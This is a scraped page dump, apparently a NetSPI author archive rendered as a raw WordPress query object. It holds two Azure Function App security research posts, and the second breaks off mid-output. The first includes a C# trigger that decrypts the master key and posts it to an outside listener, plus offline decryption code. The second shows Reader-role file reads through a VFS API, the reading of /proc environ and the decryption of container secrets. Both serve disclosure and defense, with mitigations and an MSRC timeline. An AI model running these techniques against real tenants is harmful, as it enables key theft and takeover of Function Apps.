Karl Fosaaen

As a VP of Research, Karl is part of a team developing new services and product offerings at NetSPI. Karl previously oversaw the Cloud Penetration Testing service lines at NetSPI and is one of the founding members of NetSPI's Portland, OR team. Karl has a Bachelors of Computer Science from the University of Minnesota and has been in the security consulting industry for 15 years. Karl spends most of his research time focusing on Azure security and contributing to the NetSPI blog. As part of this research, Karl created the MicroBurst toolkit to house many of the PowerShell tools that he uses for testing Azure. In 2021, Karl co-authored the book "Penetration Testing Azure for Ethical Hackers" with David Okeyode.
More by Karl Fosaaen
WP_Query Object
(
    [query] => Array
        (
            [post_type] => Array
                (
                    [0] => post
                    [1] => webinars
                )

            [posts_per_page] => -1
            [post_status] => publish
            [meta_query] => Array
                (
                    [relation] => OR
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "10"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "10"
                            [compare] => LIKE
                        )

                )

        )

    [query_vars] => Array
        (
            [post_type] => Array
                (
                    [0] => post
                    [1] => webinars
                )

            [posts_per_page] => -1
            [post_status] => publish
            [meta_query] => Array
                (
                    [relation] => OR
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "10"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "10"
                            [compare] => LIKE
                        )

                )

            [error] => 
            [m] => 
            [p] => 0
            [post_parent] => 
            [subpost] => 
            [subpost_id] => 
            [attachment] => 
            [attachment_id] => 0
            [name] => 
            [pagename] => 
            [page_id] => 0
            [second] => 
            [minute] => 
            [hour] => 
            [day] => 0
            [monthnum] => 0
            [year] => 0
            [w] => 0
            [category_name] => 
            [tag] => 
            [cat] => 
            [tag_id] => 
            [author] => 
            [author_name] => 
            [feed] => 
            [tb] => 
            [paged] => 0
            [meta_key] => 
            [meta_value] => 
            [preview] => 
            [s] => 
            [sentence] => 
            [title] => 
            [fields] => 
            [menu_order] => 
            [embed] => 
            [category__in] => Array
                (
                )

            [category__not_in] => Array
                (
                )

            [category__and] => Array
                (
                )

            [post__in] => Array
                (
                )

            [post__not_in] => Array
                (
                )

            [post_name__in] => Array
                (
                )

            [tag__in] => Array
                (
                )

            [tag__not_in] => Array
                (
                )

            [tag__and] => Array
                (
                )

            [tag_slug__in] => Array
                (
                )

            [tag_slug__and] => Array
                (
                )

            [post_parent__in] => Array
                (
                )

            [post_parent__not_in] => Array
                (
                )

            [author__in] => Array
                (
                )

            [author__not_in] => Array
                (
                )

            [search_columns] => Array
                (
                )

            [ignore_sticky_posts] => 
            [suppress_filters] => 
            [cache_results] => 1
            [update_post_term_cache] => 1
            [update_menu_item_cache] => 
            [lazy_load_term_meta] => 1
            [update_post_meta_cache] => 1
            [nopaging] => 1
            [comments_per_page] => 50
            [no_found_rows] => 
            [order] => DESC
        )

    [tax_query] => WP_Tax_Query Object
        (
            [queries] => Array
                (
                )

            [relation] => AND
            [table_aliases:protected] => Array
                (
                )

            [queried_terms] => Array
                (
                )

            [primary_table] => wp_posts
            [primary_id_column] => ID
        )

    [meta_query] => WP_Meta_Query Object
        (
            [queries] => Array
                (
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "10"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "10"
                            [compare] => LIKE
                        )

                    [relation] => OR
                )

            [relation] => OR
            [meta_table] => wp_postmeta
            [meta_id_column] => post_id
            [primary_table] => wp_posts
            [primary_id_column] => ID
            [table_aliases:protected] => Array
                (
                    [0] => wp_postmeta
                )

            [clauses:protected] => Array
                (
                    [wp_postmeta] => Array
                        (
                            [key] => new_authors
                            [value] => "10"
                            [compare] => LIKE
                            [compare_key] => =
                            [alias] => wp_postmeta
                            [cast] => CHAR
                        )

                    [wp_postmeta-1] => Array
                        (
                            [key] => new_presenters
                            [value] => "10"
                            [compare] => LIKE
                            [compare_key] => =
                            [alias] => wp_postmeta
                            [cast] => CHAR
                        )

                )

            [has_or_relation:protected] => 1
        )

    [date_query] => 
    [request] => 
			SELECT   wp_posts.*
			FROM wp_posts  INNER JOIN wp_postmeta ON ( wp_posts.ID = wp_postmeta.post_id )
			WHERE 1=1  AND ( 
  ( wp_postmeta.meta_key = 'new_authors' AND wp_postmeta.meta_value LIKE '{5291b021f4414c1ccaad19af93a51ba83ba3d5a793b6b8cb8820e73dfc6d301a}\"10\"{5291b021f4414c1ccaad19af93a51ba83ba3d5a793b6b8cb8820e73dfc6d301a}' ) 
  OR 
  ( wp_postmeta.meta_key = 'new_presenters' AND wp_postmeta.meta_value LIKE '{5291b021f4414c1ccaad19af93a51ba83ba3d5a793b6b8cb8820e73dfc6d301a}\"10\"{5291b021f4414c1ccaad19af93a51ba83ba3d5a793b6b8cb8820e73dfc6d301a}' )
) AND wp_posts.post_type IN ('post', 'webinars') AND ((wp_posts.post_status = 'publish'))
			GROUP BY wp_posts.ID
			ORDER BY wp_posts.post_date DESC
			
		
    [posts] => Array
        (
            [0] => WP_Post Object
                (
                    [ID] => 30784
                    [post_author] => 37
                    [post_date] => 2023-08-12 13:30:00
                    [post_date_gmt] => 2023-08-12 18:30:00
                    [post_content] => 

When deploying an Azure Function App, you’re typically prompted to select a Storage Account to use in support of the application. Access to these supporting Storage Accounts can lead to disclosure of Function App source code, command execution in the Function App, and (as we’ll show in this blog) decryption of the Function App Access Keys.

Azure Function Apps use Access Keys to secure access to HTTP Trigger functions. There are three types of access keys that can be used: function, system, and master (HTTP function endpoints can also be accessed anonymously). The most privileged access key available is the master key, which grants administrative access to the Function App including being able to read and write function source code.  

The master key should be protected and should not be used for regular activities. Gaining access to the master key could lead to supply chain attacks and control of any managed identities assigned to the Function. This blog explores how an attacker can decrypt these access keys if they gain access via the Function App’s corresponding Storage Account. 

TLDR; 

  • Function App Access Keys can be stored in Storage Account containers in an encrypted format 
  • Access Keys can be decrypted within the Function App container AND offline 
  • Works with Windows or Linux, with any runtime stack 
  • Decryption requires access to the decryption key (stored in an environment variable in the Function container) and the encrypted key material (from host.json). 

Previous Research 

Requirements 

Function Apps depend on Storage Accounts at multiple product tiers for code and secret storage. Extensive research has already been done for attacking Functions directly and via the corresponding Storage Accounts for Functions. This blog will focus specifically on key decryption for Function takeover. 

Required Permissions 

  • Permission to read Storage Account Container blobs, specifically the host.json file (located in Storage Account Containers named “azure-webjobs-secrets”) 
  • Permission to write to Azure File Shares hosting Function code
Screenshot of Storage Accounts associated with a Function App

The host.json file contains the encrypted access keys. The encrypted master key is contained in the masterKey.value field.

{ 
  "masterKey": { 
    "name": "master", 
    "value": "CfDJ8AAAAAAAAAAAAAAAAAAAAA[TRUNCATED]IA", 
    "encrypted": true 
  }, 
  "functionKeys": [ 
    { 
      "name": "default", 
      "value": "CfDJ8AAAAAAAAAAAAAAAAAAAAA[TRUNCATED]8Q", 
      "encrypted": true 
    } 
  ], 
  "systemKeys": [],
  "hostName": "thisisafakefunctionappprobably.azurewebsites.net",
  "instanceId": "dc[TRUNCATED]c3",
  "source": "runtime",
  "decryptionKeyId": "MACHINEKEY_DecryptionKey=op+[TRUNCATED]Z0=;"
}

The code for the corresponding Function App is stored in Azure File Shares. For what it's worth, with access to the host.json file, an attacker can technically overwrite existing keys and set the "encrypted" parameter to false, to inject their own cleartext function keys into the Function App (see Rogier Dijkman’s research). The directory structure for a Windows ASP.NET Function App (thisisnotrealprobably) typically uses the following structure: 

A new function can be created by adding a new set of folders under the wwwroot folder in the SMB file share. 

The ability to create a new function trigger by creating folders in the File Share is necessary to either decrypt the key in the function runtime OR return the decryption key by retrieving a specific environment variable. 

Decryption in the Function container 

Function App Key Decryption is dependent on ASP.NET Core Data Protection. There are multiple references to a specific library for Function Key security in the Function Host code.  

An old version of this library can be found at https://github.com/Azure/azure-websites-security. This library creates a Function specific Azure Data Protector for decryption. The code below has been modified from an old MSDN post to integrate the library directly into a .NET HTTP trigger. Providing the encrypted master key to the function decrypts the key upon triggering. 

The sample code below can be modified to decrypt the key and then send the key to a publicly available listener. 

#r "Newtonsoft.Json" 

using Microsoft.AspNetCore.DataProtection; 
using Microsoft.Azure.Web.DataProtection; 
using System.Net.Http; 
using System.Text; 
using System.Net; 
using Microsoft.AspNetCore.Mvc; 
using Microsoft.Extensions.Primitives; 
using Newtonsoft.Json; 

private static HttpClient httpClient = new HttpClient(); 

public static async Task<IActionResult> Run(HttpRequest req, ILogger log) 
{ 
    log.LogInformation("C# HTTP trigger function processed a request."); 

    DataProtectionKeyValueConverter converter = new DataProtectionKeyValueConverter(); 
    string keyname = "master"; 
    string encval = "Cf[TRUNCATED]NQ"; 
    var ikey = new Key(keyname, encval, true); 

    if (ikey.IsEncrypted) 
    { 
        ikey = converter.ReadValue(ikey); 
    } 
    // log.LogInformation(ikey.Value); 
    string url = "https://[TRUNCATED]"; 
    string body = $"{{"name":"{keyname}", "value":"{ikey.Value}"}}"; 
    var response = await httpClient.PostAsync(url, new StringContent(body.ToString())); 

    string name = req.Query["name"]; 

    string requestBody = await new StreamReader(req.Body).ReadToEndAsync(); 
    dynamic data = JsonConvert.DeserializeObject(requestBody); 
    name = name ?? data?.name; 

    string responseMessage = string.IsNullOrEmpty(name) 
        ? "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response." 
                : $"Hello, {name}. This HTTP triggered function executed successfully."; 

            return new OkObjectResult(responseMessage); 
} 

class DataProtectionKeyValueConverter 
{ 
    private readonly IDataProtector _dataProtector; 
 
    public DataProtectionKeyValueConverter() 
    { 
        var provider = DataProtectionProvider.CreateAzureDataProtector(); 
        _dataProtector = provider.CreateProtector("function-secrets"); 
    } 

    public Key ReadValue(Key key) 
    { 
        var resultKey = new Key(key.Name, null, false); 
        resultKey.Value = _dataProtector.Unprotect(key.Value); 
        return resultKey; 
    } 
} 

class Key 
{ 
    public Key(){} 

    public Key(string name, string value, bool encrypted) 
    { 
        Name = name; 
        Value = value; 
        IsEncrypted = encrypted; 
    } 

    [JsonProperty(PropertyName = "name")] 
    public string Name { get; set; } 

    [JsonProperty(PropertyName = "value")] 
    public string Value { get; set; } 

    [JsonProperty(PropertyName = "encrypted")] 
    public bool IsEncrypted { get; set; }
}

Triggering via browser: 

Screenshot of triggering via browser saying This HTTP triggered function executed successfully. Pass a name in the query body for a personalized response.

Burp Collaborator:

Screenshot of Burp collaborator.

Master key:

Screenshot of Master key.

Local Decryption 

Decryption can also be done outside of the function container. The https://github.com/Azure/azure-websites-security repo contains an older version of the code that can be pulled down and run locally through Visual Studio. However, there is one requirement for running locally and that is access to the decryption key.

The code makes multiple references to the location of default keys:

The Constants.cs file leads to two environment variables of note: AzureWebEncryptionKey (default) or MACHINEKEY_DecryptionKey. The decryption code defaults to the AzureWebEncryptionKey environment variable.  

One thing to keep in mind is that the environment variable will be different depending on the underlying Function operating system. Linux based containers will use AzureWebEncryptionKey while Windows will use MACHINEKEY_DecryptionKey. One of those environment variables will be available via Function App Trigger Code, regardless of the runtime used. The environment variable values can be returned in the Function by using native code. Example below is for PowerShell in a Windows environment: 

$env:MACHINEKEY_DecryptionKey

This can then be returned to the user via an HTTP Trigger response or by having the Function send the value to another endpoint. 

The local decryption can be done once the encrypted key data and the decryption keys are obtained. After pulling down the GitHub repo and getting it setup in Visual Studio, quick decryption can be done directly through an existing test case in DataProtectionProviderTests.cs. The following edits can be made.

// Copyright (c) .NET Foundation. All rights reserved. 
// Licensed under the MIT License. See License.txt in the project root for license information. 

using System; 
using Microsoft.Azure.Web.DataProtection; 
using Microsoft.AspNetCore.DataProtection; 
using Xunit; 
using System.Diagnostics; 
using System.IO; 

namespace Microsoft.Azure.Web.DataProtection.Tests 
{ 
    public class DataProtectionProviderTests 
    { 
        [Fact] 
        public void EncryptedValue_CanBeDecrypted()  
        { 
            using (var variables = new TestScopedEnvironmentVariable(Constants.AzureWebsiteLocalEncryptionKey, "CE[TRUNCATED]1B")) 
            { 
                var provider = DataProtectionProvider.CreateAzureDataProtector(null, true); 

                var protector = provider.CreateProtector("function-secrets"); 

                string expected = "test string"; 

                // string encrypted = protector.Protect(expected); 
                string encrypted = "Cf[TRUNCATED]8w"; 

                string result = protector.Unprotect(encrypted); 

                File.WriteAllText("test.txt", result); 
                Assert.Equal(expected, result); 
            } 
        } 
    } 
} 

Run the test case after replacing the variable values with the two required items. The test will fail, but the decrypted master key will be returned in test.txt! This can then be used to query the Function App administrative REST APIs. 

Tool Overview 

NetSPI created a proof-of-concept tool to exploit Function Apps through the connected Storage Account. This tool requires write access to the corresponding File Share where the Function code is stored and supports .NET, PSCore, Python, and Node. Given a Storage Account that is connected to a Function App, the tool will attempt to create a HTTP Trigger (function-specific API key required for access) to return the decryption key and scoped Managed Identity access tokens (if applicable). The tool will also attempt to cleanup any uploaded code once the key and tokens are received.  

Once the encryption key and encrypted function app key are returned, you can use the Function App code included in the repo to decrypt the master key. To make it easier, we’ve provided an ARM template in the repo that will create the decryption Function App for you.

Screenshot of welcome screen to the NetSPI "FuncoPop" app (Function App Key Decryption).

See the GitHub link https://github.com/NetSPI/FuncoPop for more info. 

Prevention and Mitigation 

There are a number of ways to prevent the attack scenarios outlined in this blog and in previous research. The best prevention strategy is treating the corresponding Storage Accounts as an extension of the Function Apps. This includes: 

  1. Limiting the use of Storage Account Shared Access Keys and ensuring that they are not stored in cleartext.
  1. Rotating Shared Access Keys. 
  1. Limiting the creation of privileged, long lasting SAS tokens. 
  1. Use the principle of least privilege. Only grant the least privileges necessary to narrow scopes. Be aware of any roles that grant write access to Storage Accounts (including those roles with list key permissions!) 
  1. Identify Function Apps that use Storage Accounts and ensure that these resources are placed in dedicated Resource Groups.
  1. Avoid using shared Storage Accounts for multiple Functions. 
  1. Ensure that Diagnostic Settings are in place to collect audit and data plane logs. 

More direct methods of mitigation can also be taken such as storing keys in Key Vaults or restricting Storage Accounts to VNETs. See the links below for Microsoft recommendations. 

MSRC Timeline 

As part of our standard Azure research process, we ran our findings by MSRC before publishing anything. 

02/08/2023 - Initial report created
02/13/2023 - Case closed as expected and documented behavior
03/08/2023 - Second report created
04/25/2023 - MSRC confirms original assessment as expected and documented behavior 
08/12/2023 - DefCon Cloud Village presentation 

Thanks to Nick Landers for his help/research into ASP.NET Core Data Protection. 

[post_title] => What the Function: Decrypting Azure Function App Keys  [post_excerpt] => When deploying an Azure Function App, access to supporting Storage Accounts can lead to disclosure of source code, command execution in the app, and decryption of the app’s Access Keys. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => what-the-function-decrypting-azure-function-app-keys [to_ping] => [pinged] => [post_modified] => 2023-08-08 09:25:11 [post_modified_gmt] => 2023-08-08 14:25:11 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=30784 [menu_order] => 14 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [1] => WP_Post Object ( [ID] => 29749 [post_author] => 10 [post_date] => 2023-03-23 08:24:36 [post_date_gmt] => 2023-03-23 13:24:36 [post_content] =>

As penetration testers, we continue to see an increase in applications built natively in the cloud. These are a mix of legacy applications that are ported to cloud-native technologies and new applications that are freshly built in the cloud provider. One of the technologies that we see being used to support these development efforts is Azure Function Apps. We recently took a deeper look at some of the Function App functionality that resulted in a privilege escalation scenario for users with Reader role permissions on Function Apps. In the case of functions running in Linux containers, this resulted in command execution in the application containers. 

TL;DR 

Undocumented APIs used by the Azure Function Apps Portal menu allowed for arbitrary file reads on the Function App containers.  

  • For the Windows containers, this resulted in access to ASP. Net encryption keys. 
  • For the Linux containers, this resulted in access to function master keys that allowed for overwriting Function App code and gaining remote code execution in the container. 
https://www.youtube.com/watch?v=ClCeHiKIQqE

What are Azure Function Apps?

As noted above, Function Apps are one of the pieces of technology used for building cloud-native applications in Azure. The service falls under the umbrella of “App Services” and has many of the common features of the parent service. At its core, the Function App service is a lightweight API service that can be used for hosting serverless application services.  

The Azure Portal allows users (with Reader or greater permissions) to view files associated with the Function App, along with the code for the application endpoints (functions). In the Azure Portal, under App files, we can see the files available at the root of the Function App. These are usually requirement files and any supporting files you want to have available for all underlying functions. 

An example of a file available at the root of the Function App within the Azure Portal.

Under the individual functions (HttpTrigger1), we can enter the Code + Test menu to see the source code for the function. Much like the code in an Automation Account Runbook, the function code is available to anyone with Reader permissions. We do frequently find hardcoded credentials in this menu, so this is a common menu for us to work with. 

A screenshot of the source for the function (HttpTrigger1).

Both file viewing options rely on an undocumented API that can be found by proxying your browser traffic while accessing the Azure Portal. The following management.azure.com API endpoint uses the VFS function to list files in the Function App:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tes
ter/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?rel
ativePath=1&api-version=2021-01-15 

In the example above, $SUB_ID would be your subscription ID, and this is for the “vfspoc” Function App in the “tester” resource group.

Identify and fix insecure Azure configurations. Explore NetSPI’s Azure Penetration Testing solutions.

Discovery of the Issue

Using the identified URL, we started enumerating available files in the output:

[
  {
    "name": "host.json",
    "size": 141,
    "mtime": "2022-08-02T19:49:04.6152186+00:00",
    "crtime": "2022-08-02T19:49:04.6092235+00:00",
    "mime": "application/json",
    "href": "https://vfspoc.azurewebsites.net/admin/vfs/host.
json?relativePath=1&api-version=2021-01-15",
    "path": "C:\\home\\site\\wwwroot\\host.json"
  },
  {
    "name": "HttpTrigger1",
    "size": 0,
    "mtime": "2022-08-02T19:51:52.0190425+00:00",
    "crtime": "2022-08-02T19:51:52.0190425+00:00",
    "mime": "inode/directory",
    "href": "https://vfspoc.azurewebsites.net/admin/vfs/Http
Trigger1%2F?relativePath=1&api-version=2021-01-15",
    "path": "C:\\home\\site\\wwwroot\\HttpTrigger1"
  }
]

As we can see above, this is the expected output. We can see the host.json file that is available in the Azure Portal, and the HttpTrigger1 function directory. At first glance, this may seem like nothing. While reviewing some function source code in client environments, we noticed that additional directories were being added to the Function App root directory to add libraries and supporting files for use in the functions. These files are not visible in the Portal if they’re in a directory (See “Secret Directory” below). The Portal menu doesn’t have folder handling built in, so these files seem to be invisible to anyone with the Reader role. 

Function app files menu not showing the secret directory in the file drop down.

By using the VFS APIs, we can view all the files in these application directories, including sensitive files that the Azure Function App Contributors might have assumed were hidden from Readers. While this is a minor information disclosure, we can take the issue further by modifying the “relativePath” parameter in the URL from a “1” to a “0”. 

Changing this parameter allows us to now see the direct file system of the container. In this first case, we’re looking at a Windows Function App container. As a test harness, we’ll use a little PowerShell to grab a “management.azure.com” token from our authenticated (as a Reader) Azure PowerShell module session, and feed that to the API for our requests to read the files from the vfspoc Function App. 

$mgmtToken = (Get-AzAccessToken -ResourceUrl 
"https://management.azure.com").Token 

(Invoke-WebRequest -Verbose:$false -Uri (-join ("https://management.
azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/
Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?relativePath=
0&api-version=2021-01-15")) -Headers @{Authorization="Bearer 
$mgmtToken"}).Content | ConvertFrom-Json 

name   : data 
size   : 0 
mtime  : 2022-09-12T20:20:48.2362984+00:00 
crtime : 2022-09-12T20:20:48.2362984+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/data%2F?
relativePath=0&api-version=2021-01-15 
path   : D:\home\data 

name   : LogFiles 
size   : 0 
mtime  : 2022-09-12T20:20:02.5561162+00:00 
crtime : 2022-09-12T20:20:02.5561162+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/LogFiles%2
F?relativePath=0&api-version=2021-01-15 
path   : D:\home\LogFiles 

name   : site 
size   : 0 
mtime  : 2022-09-12T20:20:02.5701081+00:00 
crtime : 2022-09-12T20:20:02.5701081+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/site%2F?
relativePath=0&api-version=2021-01-15 
path   : D:\home\site 

name   : ASP.NET 
size   : 0 
mtime  : 2022-09-12T20:20:48.2362984+00:00 
crtime : 2022-09-12T20:20:48.2362984+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/ASP.NET%2F
?relativePath=0&api-version=2021-01-15 
path   : D:\home\ASP.NET

Access to Encryption Keys on the Windows Container

With access to the container’s underlying file system, we’re now able to browse into the ASP.NET directory on the container. This directory contains the “DataProtection-Keys” subdirectory, which houses xml files with the encryption keys for the application. 

Here’s an example URL and file for those keys:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/
tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs/
/ASP.NET/DataProtection-Keys/key-ad12345a-e321-4a1a-d435-4a98ef4b3
fb5.xml?relativePath=0&api-version=2018-11-01 

<?xml version="1.0" encoding="utf-8"?> 
<key id="ad12345a-e321-4a1a-d435-4a98ef4b3fb5" version="1"> 
  <creationDate>2022-03-29T11:23:34.5455524Z</creationDate> 
  <activationDate>2022-03-29T11:23:34.2303392Z</activationDate> 
  <expirationDate>2022-06-27T11:23:34.2303392Z</expirationDate> 
  <descriptor deserializerType="Microsoft.AspNetCore.DataProtection.
AuthenticatedEncryption.ConfigurationModel.AuthenticatedEncryptor
DescriptorDeserializer, Microsoft.AspNetCore.DataProtection, 
Version=3.1.18.0, Culture=neutral 
, PublicKeyToken=ace99892819abce50"> 
    <descriptor> 
      <encryption algorithm="AES_256_CBC" /> 
      <validation algorithm="HMACSHA256" /> 
      <masterKey p4:requiresEncryption="true" xmlns:p4="
http://schemas.asp.net/2015/03/dataProtection"> 
        <!-- Warning: the key below is in an unencrypted form. --> 
        <value>a5[REDACTED]==</value> 
      </masterKey> 
    </descriptor> 
  </descriptor> 
</key> 

While we couldn’t use these keys during the initial discovery of this issue, there is potential for these keys to be abused for decrypting information from the Function App. Additionally, we have more pressing issues to look at in the Linux container.

Command Execution on the Linux Container

Since Function Apps can run in both Windows and Linux containers, we decided to spend a little time on the Linux side with these APIs. Using the same API URLs as before, we change them over to a Linux container function app (vfspoc2). As we see below, this same API (with “relativePath=0”) now exposes the Linux base operating system files for the container:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//?relativePath=0&api-version=2021-01-15 

JSON output parsed into a PowerShell object: 
name   : lost+found 
size   : 0 
mtime  : 1970-01-01T00:00:00+00:00 
crtime : 1970-01-01T00:00:00+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/lost%2Bfound%2F?relativePath=0&api-version=2021-01-15 
path   : /lost+found 

[Truncated] 

name   : proc 
size   : 0 
mtime  : 2022-09-14T22:28:57.5032138+00:00 
crtime : 2022-09-14T22:28:57.5032138+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc%2F?relativePath=0&api-version=2021-01-15 
path   : /proc 

[Truncated] 

name   : tmp 
size   : 0 
mtime  : 2022-09-14T22:56:33.6638983+00:00 
crtime : 2022-09-14T22:56:33.6638983+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/tmp%2F?relativePath=0&api-version=2021-01-15 
path   : /tmp 

name   : usr 
size   : 0 
mtime  : 2022-09-02T21:47:36+00:00 
crtime : 1970-01-01T00:00:00+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/usr%2F?relativePath=0&api-version=2021-01-15 
path   : /usr 

name   : var 
size   : 0 
mtime  : 2022-09-03T21:23:43+00:00 
crtime : 2022-09-03T21:23:43+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/var%2F?relativePath=0&api-version=2021-01-15 
path   : /var 

Breaking out one of my favorite NetSPI blogs, Directory Traversal, File Inclusion, and The Proc File System, we know that we can potentially access environmental variables for different PIDs that are listed in the “proc” directory.  

Description of the function of the environ file in the proc file system.

If we request a listing of the proc directory, we can see that there are a handful of PIDs (denoted by the numbers) listed:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//proc/?relativePath=0&api-version=2021-01-15 

JSON output parsed into a PowerShell object: 
name   : fs 
size   : 0 
mtime  : 2022-09-21T22:00:39.3885209+00:00 
crtime : 2022-09-21T22:00:39.3885209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/fs/?relativePath=0&api-version=2021-01-15 
path   : /proc/fs 

name   : bus 
size   : 0 
mtime  : 2022-09-21T22:00:39.3895209+00:00 
crtime : 2022-09-21T22:00:39.3895209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/bus/?relativePath=0&api-version=2021-01-15 
path   : /proc/bus 

[Truncated] 

name   : 1 
size   : 0 
mtime  : 2022-09-21T22:00:38.2025209+00:00 
crtime : 2022-09-21T22:00:38.2025209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1/?relativePath=0&api-version=2021-01-15 
path   : /proc/1 

name   : 16 
size   : 0 
mtime  : 2022-09-21T22:00:38.2025209+00:00 
crtime : 2022-09-21T22:00:38.2025209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/16/?relativePath=0&api-version=2021-01-15 
path   : /proc/16 

[Truncated] 

name   : 59 
size   : 0 
mtime  : 2022-09-21T22:00:38.6785209+00:00 
crtime : 2022-09-21T22:00:38.6785209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/59/?relativePath=0&api-version=2021-01-15 
path   : /proc/59 

name   : 1113 
size   : 0 
mtime  : 2022-09-21T22:16:09.1248576+00:00 
crtime : 2022-09-21T22:16:09.1248576+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1113/?relativePath=0&api-version=2021-01-15 
path   : /proc/1113 

name   : 1188 
size   : 0 
mtime  : 2022-09-21T22:17:18.5695703+00:00 
crtime : 2022-09-21T22:17:18.5695703+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1188/?relativePath=0&api-version=2021-01-15 
path   : /proc/1188

For the next step, we can use PowerShell to request the “environ” file from PID 59 to get the environmental variables for that PID. We will then write it to a temp file and “get-content” the file to output it.

$mgmtToken = (Get-AzAccessToken -ResourceUrl "https://management.azure.com").Token 

Invoke-WebRequest -Verbose:$false -Uri (-join ("https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//proc/59/environ?relativePath=0&api-version=2021-01-15")) -Headers @{Authorization="Bearer $mgmtToken"} -OutFile .\TempFile.txt 

gc .\TempFile.txt 

PowerShell Output - Newlines added for clarity: 
CONTAINER_IMAGE_URL=mcr.microsoft.com/azure-functions/mesh:3.13.1-python3.7 
REGION_NAME=Central US  
HOSTNAME=SandboxHost-637993944271867487  
[Truncated] 
CONTAINER_ENCRYPTION_KEY=bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=  
LANG=C.UTF-8  
CONTAINER_NAME=E9911CE2-637993944227393451 
[Truncated]
CONTAINER_START_CONTEXT_SAS_URI=http://wawsstorageproddm1157.blob.core.windows.net/azcontainers/e9911ce2-637993944227393451?sv=2014-02-14&sr=b&sig=5ce7MUXsF4h%2Fr1%2BfwIbEJn6RMf2%2B06c2AwrNSrnmUCU%3D&st=2022-09-21T21%3A55%3A22Z&se=2023-09-21T22%3A00%3A22Z&sp=r
[Truncated]

In the output, we can see that there are a couple of interesting variables. 

  • CONTAINER_ENCRYPTION_KEY 
  • CONTAINER_START_CONTEXT_SAS_URI 

The encryption key variable is self-explanatory, and the SAS URI should be familiar to anyone that read Jake Karnes’ post on attacking Azure SAS tokens. If we navigate to the SAS token URL, we’re greeted with an “encryptedContext” JSON blob. Conveniently, we have the encryption key used for this data. 

A screenshot of an "encryptedContext" JSON blob with the encryption key.

Using CyberChef, we can quickly pull together the pieces to decrypt the data. In this case, the IV is the first portion of the JSON blob (“Bad/iquhIPbJJc4n8wcvMg==”). We know the key (“bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=”), so we will just use the middle portion of the Base64 JSON blob as our input.  

Here’s what the recipe looks like in CyberChef: 

An example of using CyberChef to decrypt data from a JSON blob.

Once decrypted, we have another JSON blob of data, now with only one encrypted chunk (“EncryptedEnvironment”). We won’t be dealing with that data as the important information has already been decrypted below. 

{"SiteId":98173790,"SiteName":"vfspoc2", 
"EncryptedEnvironment":"2 | Xj[REDACTED]== | XjAN7[REDACTED]KRz", 
"Environment":{"FUNCTIONS_EXTENSION_VERSION":"~3", 
"APPSETTING_FUNCTIONS_EXTENSION_VERSION":"~3", 
"FUNCTIONS_WORKER_RUNTIME":"python", 
"APPSETTING_FUNCTIONS_WORKER_RUNTIME":"python", 
"AzureWebJobsStorage":"DefaultEndpointsProtocol=https;AccountName=
storageaccountfunct9626;AccountKey=7s[REDACTED]uA==;EndpointSuffix=
core.windows.net", 
"APPSETTING_AzureWebJobsStorage":"DefaultEndpointsProtocol=https;
AccountName=storageaccountfunct9626;AccountKey=7s[REDACTED]uA==;
EndpointSuffix=core.windows.net", 
"ScmType":"None", 
"APPSETTING_ScmType":"None", 
"WEBSITE_SITE_NAME":"vfspoc2", 
"APPSETTING_WEBSITE_SITE_NAME":"vfspoc2", 
"WEBSITE_SLOT_NAME":"Production", 
"APPSETTING_WEBSITE_SLOT_NAME":"Production", 
"SCM_RUN_FROM_PACKAGE":"https://storageaccountfunct9626.blob.core.
windows.net/scm-releases/scm-latest-vfspoc2.zip?sv=2014-02-14&sr=b&
sig=%2BN[REDACTED]%3D&se=2030-03-04T17%3A16%3A47Z&sp=rw", 
